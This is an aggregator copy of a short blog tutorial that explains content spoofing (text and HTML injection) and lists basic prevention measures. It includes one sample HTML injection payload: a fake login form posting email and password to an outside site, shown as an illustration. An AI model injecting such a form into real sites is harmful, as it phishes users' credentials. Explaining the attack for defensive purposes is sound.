What is Content Spoofing and how to prevent it
source link: https://www.laravelcode.com/post/what-is-content-spoofing-and-how-to-prevent-it
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
What is Content Spoofing and how to prevent it
In this article, we will discuss about what is Content Spoofing, how it will affect your website and business, and how to prevent Content Spoofing.
what is Content Spoofing?
Content Spoofing or Content Injection is one of the common website attack targetting specific user or group of users by vulnerability on web application. It happens when web application is can't handle data supplied by end user. The attacker inject text or HTML content in the website, mostly through parameters. And the supplied data reflects back on the webpage. This type of attack mostly done to affect website SEO or defame businesses by compititors.
Content Spoofing is closely similar to Cross-site Scripting(XSS) except XSS uses javascript code to run script in the webpage while Content Spoofing is about changing webpage content.
There are two type of attacks possible:
1. Text Injection
2. HTML Injection
Text Injection
Text Injection is type of Content Spoofing attack where attacker inject text data in the website and change the content of the website. For example, In some cases attacker might pass data via request parameters and create malicious link of trusted website.
For example, common website have login page, where error message display from query parameters.
Now attacker change this error message like below and send other users to ask login to another website and may get login credentials from users.
HTML Injection
HTML injection is same as text injection but in this type of attack, HTML content is injected in webpage. In the above example, attacker may push HTML code into website and get user login data.
action="http://anothersite/login">EMail: <input type="text" name="email" /><br />Password: <input type="password"
name="password" /><input type="submit" value="Login" /></form>
How to prevent Content Spoofing?
Here are few measures you can take to stop Content Spoofing:
1. Avoid use of displaying messages via request parameters, instead use temporary sessions.
2. Validate the data which are reflecting via request parameter.
3. Avoid passing HTML data through request parameter, if you really need it, use proper encoding before passing.
Author : Harsukh Makwana
Hi, My name is Harsukh Makwana. i have been work with many programming language like php, python, javascript, node, react, anguler, etc.. since last 5 year. if you have any issue or want me hire then contact me on [email protected]
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK